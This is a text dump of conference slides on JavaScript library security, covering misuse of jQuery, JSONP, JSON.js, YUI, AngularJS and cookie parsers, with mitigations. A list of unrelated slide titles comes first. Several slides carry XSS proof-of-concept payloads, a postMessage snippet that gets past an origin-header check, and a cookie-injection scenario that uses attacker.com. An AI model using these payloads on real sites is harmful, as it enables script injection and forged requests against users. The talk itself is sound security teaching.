Connecting the Dots for Information Discovery.pdf
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

JavaScript Libraries (in)security: A showcase of reckless uses and unwitting misuses.

  • 1. JS Libraries Insecurity Appsec EU 2013 Stefano di Paola CTO @ Minded Security stefano.dipaola@mindedsecurity.com
  • 2. /me whois • Research – OWASP-Italy Senior Member – Testing Guide Contributor – OWASP SWFIntruder – DOMinator (JS Runtime Taint Engine) – Bug Hunter & Sec Research (Pdf Uxss, Flash Security, HPP) – Security Since '99 • Work – CTO @ Minded Security Application Security Consulting – Director of Minded Security Research Labs – Blog: http://blog.mindedsecurity.com – Twitter: @wisecwisec
  • 3. Agenda • Intro • JQuery • JSON.js (OBG) • YUI • AngularJS • JS Libraries Management
  • 4. About this talk • A wrap up of some interesting JS snippets • Reckless use of common libraries and third party scripts • Some unwitting one as well • Comes after 2.5 years developing/using DOMinator and DOMinatorPro
  • 5. • What's a Sink in Application Security? “..a function or method that can be considered unsecure when one of its arguments come from an untrusted input and is not correctly validated according to the layer the function is going to communicate to.“ • C's strcpy is a sink. strcpy(dst,src) • Java's jdbc.executeQuery is a sink executeQuery('select * from t where id='+str) • JQuery.html is a sink (and no one complains) JQuery() is a Sink(?)
  • 6. • JQuery is More than a Sink! • Other sinks do only one thing. JQuery was designed to perform different operations based on the argument type and content. JQuery() more than a Sink http://api.jquery.com/jQuery/
  • 7. • JQuery was written with flexibility in mind • But introduced a design issue that could be called a 'developer trust boundary violation'. – The principal use is for selecting elements (trusted) – ...and 'onload' callback execution(trusted) – The least one used is the actual sink method: JQuery() more than a Sink jQuery( html [, ownerDocument ] ) Enough Words! Show Me The Code
  • 8. • http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html http://bugs.jquery.com/ticket/9521 «XSS with $(location.hash) and $(#<tag>) is needed?» ("fixed" (?)) • http://bugs.jquery.com/ticket/11773 « jQuery needs HTML escaping functionality » (undecided) • From reddit's jquery-migrate-is-sink-too: http://www.reddit.com/r/programming/comments/1cqno2/ «.. geocar - This is one of my biggest gripes about jQuery: Using the same interface for query and executing is a Bad Idea, that is, $ ("<script>alert(69)</script>") simply shouldn't do anything at all. ..» Actually doesn't but he got the point..) -> $("<img src='dd' onerror='alert(1)'>") JQuery() Concerns History
  • 9. • Might be considered as a potentially dangerous method ? – depends on how its results are further used. • It's more than querySelectorAll because there are features like: $("div:contains(" + word + ")") What if: word=),div[id=secret]:contains(cycleForDataExtr).. • If the results will affect something that is observable by an attacker, then we got a problem! JQuery() as a Selector?
  • 10. • JQuery Users: – Never Use jQuery() or $() with an unvalidated argument – No matter which version you are using! – Read the whole documentation, please! – And since the doc is never really complete, take some time to read the code! • JQuery Developers, please: – remove old versions (zip them all for reference) – Plan to change the jQuery do-everything behaviour to a do-simply- one-thing behavior. JQuery() Solution
  • 11. • $.ajax json(p) allows three ways to create a callback parameter: a. Explicit Callback Parameter in the url b. Explicit Callback Parameter in the object c. Callback Placeholder in the url JQuery.Ajax → HPP $.ajax({url:"//host/index.html", data: "kwrds=ss&cb=test", //{cb:'test', kwrds: 'ss' } dataType:'jsonp', cache:true, success:function(){} }) $.ajax({url: '//host/index.html?kwrds=ss', jsonp: "cb", dataType: "jsonp", success: function() { } }) $.ajax({url: '//host/?kwrds=ss&cb=?', dataType: "jsonp", success: function() { } })
  • 12. • If there's HPP we can force the callback in the following cases: JQuery.Ajax Priority map Enough Words! Show Me The Code a(url) b(object) c(placehld) a(url) a c+'&'+a a+c b(object) b+'&'+a b c c(placehld) a+c c c
  • 13. • Be sure you're not allowing Client side HPP by: – Encoding tainted values with encodeURIComponent (remember it may trigger exception) JQuery.Ajax Solution try{ kw= encodeURIComponent(location.hash.slice(1)) url = 'kwrds='+kw $.ajax({ url: url, jsonp:'callback', …. }) }catch(e){ /*stop execution..blahblah*/ }
  • 14. • Devs often use $.html() with untrusted input. • Sometimes they validate that using wrong regexps patterns. JQuery.html(RegExpd) http://go.imgsmail.ru/js/unity.js?1308 h = /</?(.+?)/?>/ig; w.striptags = function(a, b) { var c = Array.isArray(b) ? b : null; return a.replace(h, c ? function(a, b) { return c.contains(b) ? a : "" } : "") };
  • 15. • ..Or they unfortunately don't work as expected... JQuery.html(RegExpd) ... var test = z7696.location.search; } catch (z392c) { z82c5 = document; } ….. var z43ac = (zbea6.length - 1); var z33f9 = {}; for (var z205e = 0; z205e <= z43ac; z205e++) { var z6b05 = zbea6[z205e].split("="); z6b05[0] = unescape(z6b05[0]); z6b05[1] = unescape(z6b05[1]); z6b05[0] = z6b05[0].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/<.*?>/g, ""); z33f9[z6b05[0]] = z6b05[1]; …. http://ots.optimize.webtrends.com/ots/lib/3.2/wt_lib.js
  • 16. • ..Or they fortunately don't work as expected... JQuery.html(RegExpd) var evil=false; var p1=/[";'<>@(){}!$^*-+|~`]/; // Regexp 4 special chars var p2=/(javascripts*:)|(alert)|/; // Regexp against XSS var url = location.href; if(url.match(p1) && url.match(p2)) // Fortunately Wrong!! evil=true; if(evil==false) div.innerHTML = url Enough Words! Show Me the Stuff!
  • 17. Test those f#@#g RegExps!!! JQuery.html(RegExpd) solution
  • 18. Test those f#@#g RegExps!!! … OR NOT (if you are damn lucky!) JQuery.html(RegExpd) solution
  • 19. • Client Request Proxy – Feature of a company's web tool (not going to disclose it today) – https://vi.ct.im/XXX/XFrame/XFrame.html – Yes, it's framable by design! – Let's have a look at the code! JQuery.ajax(Proxifyme) window.onmessage = function(e) { var requestInput = JSON.parse(e.data); var request = buildRequest(requestInput, e.source, e.origin); $.ajax(request); }
  • 20. • Attacker might just try to ask politely.. The code adds this unfriendly header: ..and the server unbelievably checks it! And returns 403. JQuery.ajax(Proxifyme) frame.location= "https://xxx/Autodiscover/XFrame/XFrame.html" var ob={ url:"/" } frame.postMessage(JSON.stringify(ob),"*") X-Ms-Origin: http://at.tack.er
  • 21. • Attacker now asks less politely.. aaand... No success! Returns 403. JQuery.ajax(Proxifyme) frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", headers:{'X-Ms.Origin':'https://vi.ct.im'} } frame.postMessage(JSON.stringify(ob),"*") X-Ms-Origin: http://at.tack.er
  • 22. • Attacker now is a bit frustrated but wait...read the jQ doc: JQuery.ajax(Proxifyme) var ob={ accepts:, // cache:, // contentType:, // Whatever data:, // "p1=v1&p2=v2.." headers:, An object of additional header key/value pairs to send along with requests using the XMLHttpRequest transport. The header X-Requested-With: XMLHttpRequest is always added. but its default XMLHttpRequest value can be changed here. Values in the headers setting can also be overwritten from within the beforeSend function. (version added: 1.5) processData:, // urlencode or not. type, // GET , POST HEAD BLAH url, // Url. xhrFields:, //XMLHttpRequest.attr = val messageId: //Internal }
  • 23. • Attacker now is less frustrated he can try something more: aand ciao ciao custom headers! • .. but there's more.. JQuery.ajax(Proxifyme) frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", XhrFields:{setRequestHeader:void} } frame.postMessage(JSON.stringify(ob),"*")
  • 24. • Why does it work? Why it doesn't break the code? We can actually add custom headers and block the X-Ms-Origin! JQuery.ajax(Proxifyme) // Need an extra try/catch for cross domain requests in Firefox 3 try { for ( i in headers ) { xhr.setRequestHeader( i, headers[ i ] ); } }catch( _ ) {}
  • 25. • http://www.ietf.org/rfc/rfc4627.txt Security considerations: JSON.js (OBG) «Generally there are security issues with scripting languages. JSON is a subset of JavaScript, but it is a safe subset that excludes assignment and invocation. A JSON text can be safely passed into JavaScript's eval() function (which compiles and executes a string) if all the characters not enclosed in strings are in the set of characters that form JSON tokens. This can be quickly determined in JavaScript with two regular expressions and calls to the test and replace methods. var my_JSON_object = !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test( text.replace(/"(.|[^"])*"/g, ''))) && eval('(' + text + ')'); Interoperability considerations: n/a Published specification: RFC 4627»
  • 26. • Old JSON.js implementation: JSON.js (OBG) http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html function jsonParse(string, secure) { if (secure && !/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/.test( string.replace(/./g, "@"). replace(/"[^"nr]*"/g, "")) ) { return null; } return eval("(" + string + ")"); }
  • 27. • parseJSON('a') is considered valid even if it's not JSON → a is actually eval'ed! • Eaeflnr-u part with no quotes let's you do this. • Next step is to see if there some standard object in window that matches the JSON regexp. Results in: self status JSON.js (OBG) http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html for(var aa in window) if( aa.match(/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/)) console.log(""+aa)
  • 28. • Still there's a lot of problems since () = cannot be used! • But on IE...: is seen as valid JSON and JSON.js (OBG) // Courtesy of Eduardo `sirdarckcat` Vela Nava +{ "valueOf": self["location"], "toString": []["join"], 0: "javascript:alert(1)", length: 1 }
  • 30. JSON.js (OBG) • '' Ok ok but it's old stuff...right? ''
  • 32. GWT's JSON safeToEval http://code.google.com/p/google-web- toolkit/source/browse/trunk/user/src/com/google/gwt/core/client/JsonUtils.java#78 /** * Returns true if the given JSON string may be safely evaluated by {@code * eval()} without undersired side effects or security risks. Note that a true * result from this method does not guarantee that the input string is valid * JSON. This method does not consider the contents of quoted strings; it * may still be necessary to perform escaping prior to evaluation for correct * results. * * <p> The technique used is taken from <a href="http://www.ietf.org/rfc/rfc4627.txt">RFC 4627</a>. */ public static native boolean safeToEval(String text) /*-{ // Remove quoted strings and disallow anything except: // // 1) symbols and brackets ,:{}[] // 2) numbers: digits 0-9, ., -, +, e, and E // 3) literal values: 'null', 'true' and 'false' = [aeflnr-u] // 4) whitespace: ' ', 'n', 'r', and 't' return !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test(text.replace(/"(.|[^"])*"/g, ''))); }-*/;
  • 33. JSON.js Solution • The new json.js uses a brand new regexp which "should" be safe • Or use json_parse.js which doesn't use eval. • ..or better use native methods JSON.parse / JSON.stringify if you can! • Finally, remember that after parsing you still have an unvalidated object! {"html":"<img src='s'onerror='XSSHere'>"}
  • 34. Cookie Parsers • cookName=cookVal; cookName2=cookVal2 • There's no native cookie parser • Good code and bad code around the internet: function getCookieValue(name){ var p; var c=document.cookie; var arrs=c.split(‘;’); for(var i =0 ; i< arrs.length; i++) if( (p=arrs[i].indexOf(name))>0){ return arrs[i].substr(p); } } getCookieVal(“mycookieName=”)
  • 35. Cookie Parsers • what if some Js writes a value like this: document.cookie=‘ref=’+document.referrer • And somewhere else: eval( getCookieVal(“userHistory”) )
  • 36. Cookie Parsers set an attacker site: http://www.attacker.com/userHist=alert(1) Iframing victim site which will sets cookie: ref=http://www.attacker.com/userHist=alert(1) Then looks for userHist and Boom!
  • 37. • YUI().use('jsonp', 'jsonp-url') http://yuilibrary.com/yui/docs/jsonp/ HPP anyone? YUI.js JSONP Customizing the JSONP URL The default URL formatter simply replaces the "{callback}" placehold with the name of the generated proxy function. If you want to customize the URL generation process, you can provide a format function in the configuration. The function will receive the configured URL (with "{callback}" placeholder), the string name of the proxy function, and any additional arguments that were passed to send(). Enough Words! Show Me The Code
  • 38. • Omniture, Web Trends, Google Ads... • Several issues found and fixed • Web Trends is a web analytics service. • DEBUG version based on parameters → HTML Injection? (They know about it) + actually this requires popup blocker disabled 3rd party services give 3rd party surprises http://XXXX/en-us/default.aspx? aaaa=11111111&gclid=1111&=&_wt.debug=2222&_wt.mode=preview&toJSON=4444&normal=9999&staging =aaaa&preview=bbbb&none=cccc&#bbbbb=2222222&%3Cs%3Essss Enough Words! Show Me The Code
  • 39. • Test and audit all the 3rd party libraries / js! • Do it periodically if they are external resources 3rd party services solution
  • 40. • Mustache + Expression Language → Interesting Injections • AngularJS uses stuff like: <div ng-init="some.js.code.here"> or {{constructor.constructor('alert(1)')()}} • AngularJS uses it's own parser (similar to Expression Language). • If there's an inection point, no actual antiXSS filter will be able to stop these attacks. • Credits to .Mario (MVCOMFG) and Kuza55 (https://communities.coverity.com/blogs/security/2013/04/23/angular- template-injection) as well for their awesome research on this topic! AngularJS
  • 41. • JavaScript code can always be read so black box turns into white box analysis • JavaScript secure development is still not fully implemented even on companies that know about security. • JavaScript Developers can be super badass coders but also naives as well on some circumstances and their code is available for everyone. • Just scratched the surface of JavaScript security! • Let's give jSanity a try! :) Conclusions
  • 42. Tnx! ^_^ Go and exploit /* ethically */ Q&A Mail: stefano.dipaola@mindedsecurity.com Twitter: wisecwisec Thanks!